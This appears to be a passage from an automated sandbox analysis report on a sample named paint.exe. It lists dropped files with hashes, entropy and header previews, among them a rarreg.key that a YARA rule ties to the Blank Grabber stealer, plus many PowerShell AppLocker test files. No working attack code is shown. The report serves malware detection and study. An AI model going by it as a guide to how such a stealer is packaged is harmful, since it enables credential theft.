SHA1:	AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:	88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:	C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	227096
Entropy (8bit):	7.928768674438361
Encrypted:	false
SSDEEP:	6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:	B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:	331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:	3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:	5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\python312.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1812848
Entropy (8bit):	7.994007517095959
Encrypted:	true
SSDEEP:	49152:pNjX6MHvtDLakdn4IozsdcnIHvOgWgpZitPvrVW:C0JLJdGwWIHGvgkg
MD5:	3C5C6C489C358149C970B3B2E562BE5F
SHA1:	2F1077DB20405B0A176597ED34A10B4730AF3CA9
SHA-256:	73A22A12EA3D7F763ED2CEA94BB877441F4134B40F043C400648D85565757741
SHA-512:	D3FB4E5DF409BF2DE4F5DC5D02D806AEE649A21C339C648248B835C3D5D66AB88312C076C149EAADAA3CE0FB43E6FA293BFA369D8876D6EB18742BD9D12448E3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......BI.P.(y..(y..(y...x..(y......(y...z..(y...}..(y...\|..(y..P...(y.t.x..(y..(x.v)y...t..(y...y..(y......(y...{..(y.Rich.(y.................PE..d....\Og.........." ...*..........P.0"k...P...................................l...........`.........................................H?k......9k......0k......._..J............l. ...........................`.k.(.....k.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........0k.....................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI67162\select.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	7.428588990290201
Encrypted:	false
SSDEEP:	768:6GXglQPmpOpYrOI+QGV7JyUFRYT2Ip4UJCxf1mltdK2363:63lymfrOI+QGVFyUzR9UefI/K2e
MD5:	E49B56F35283DF3AC2A92B28F9C95AE6
SHA1:	F5C1C660310A07DB7A05B8F05F2E4863C88ED2B3
SHA-256:	B60C00672FD0575032C8CB0CFDD7C0559D23C25262C7CC9C8980E05097A3B83C
SHA-512:	F8D295885D098650F2C1DCD2349B4F34BCD7CD6A972AFCE98DE12D4FE8A67F37DCE25B83B1953D19774F7777E1E9B344DA120C8EBBE077CAB0B948EB6C913EFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......JJs{.+.(.+.(.+.(.S.(.+.(...).+.(...).+.(...).+.(...).+.(...).+.(.+.(L+.(\|..).+.(...).+.(...).+.(...(.+.(...).+.(Rich.+.(........................PE..d....\Og.........." ...*.0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	660472
Entropy (8bit):	7.992389119368911
Encrypted:	true
SSDEEP:	12288:/nhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1GjK6T6XgEz:/nWaI6lP5+whKQusF44ZQ3sZKt1+6gX2
MD5:	7C3F235D50514A42905C355C163F5282
SHA1:	E8E9C430F51051CD8352AB23388359100DF6C89B
SHA-256:	ED3C74CC5EFD251897F2A2562679B6102920AC4B9FEDDA0E9F045E09889CB331
SHA-512:	0BB0D79A84CE20302752733942395B83D754A9FE807C608BEEC44D507375C37763C0F15EDF8BB717D306796966BC0A5D4EF10EF4AC87FB78B98A0C40B41F17C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G.x.G.x.G.x.N..K.x.V(y.E.x.V({.C.x.V(\|.O.x.V(}.J.x.5/y.D.x.G.y..x..(p.F.x..(x.F.x..(..F.x..(z.F.x.RichG.x.........PE..d....\Og.........." ...*.....0......@.....................................................`..............................................#..........................................................................P...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67162\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1016584
Entropy (8bit):	6.669319438805479
Encrypted:	false
SSDEEP:	24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
MD5:	0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
SHA1:	4189F4459C54E69C6D3155A82524BDA7549A75A6
SHA-256:	8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
SHA-512:	A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	304120
Entropy (8bit):	7.98643761888655
Encrypted:	false
SSDEEP:	6144:KL4g17Ziz1gCtki0R7KjUAkDvN/mMHvmCMztFY3oudYnc3M4QI5:KL4Q7Qz1pknmIhxsQKcFQs
MD5:	E0C3EC1835A14FB73A00DE4A6404E352
SHA1:	B74C43242235441AE8328D5AB6DB958E1F8C2743
SHA-256:	4E7FE5FE2259260B0651D517FECAC4F0F324D66F5E4FB4C90DCB1204B9B5049C
SHA-512:	125B7BFBA20E691E7EC24D0AFF271A0DE97CE7D4CBAA0FC4699FB052CE26E3151DD8042E503F41E894468C116073A8619BB35760EF12626D8B506652875C915F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G..G..G..NfY.A..V..E..V..D..V..O..V..J....D..5..E..G.......F....F...5.F....F..RichG..........PE..d....\Og.........." ...*.`....... ..0....0................................................`.............................................X....................@......................................................0...@...........................................UPX0..... ..............................UPX1.....`...0...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bkzr5yg.0kq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a0xjvib.shy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fbusmwy.2bn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fybn0rv.yyw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gyrepm1.tdr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54sqkkz3.5m2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4evswee.bq4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvyke5wx.2qj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chkdsskx.bgm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpkctx5x.rpi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2qhcjte.5q5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgarogxd.wb3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwvqxnk2.lun.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwx4yeo0.ocb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i44xqcnd.sxu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2hvyeez.czh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1ge0alc.451.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbxgzioi.pbz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_po2p3wf3.pwu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
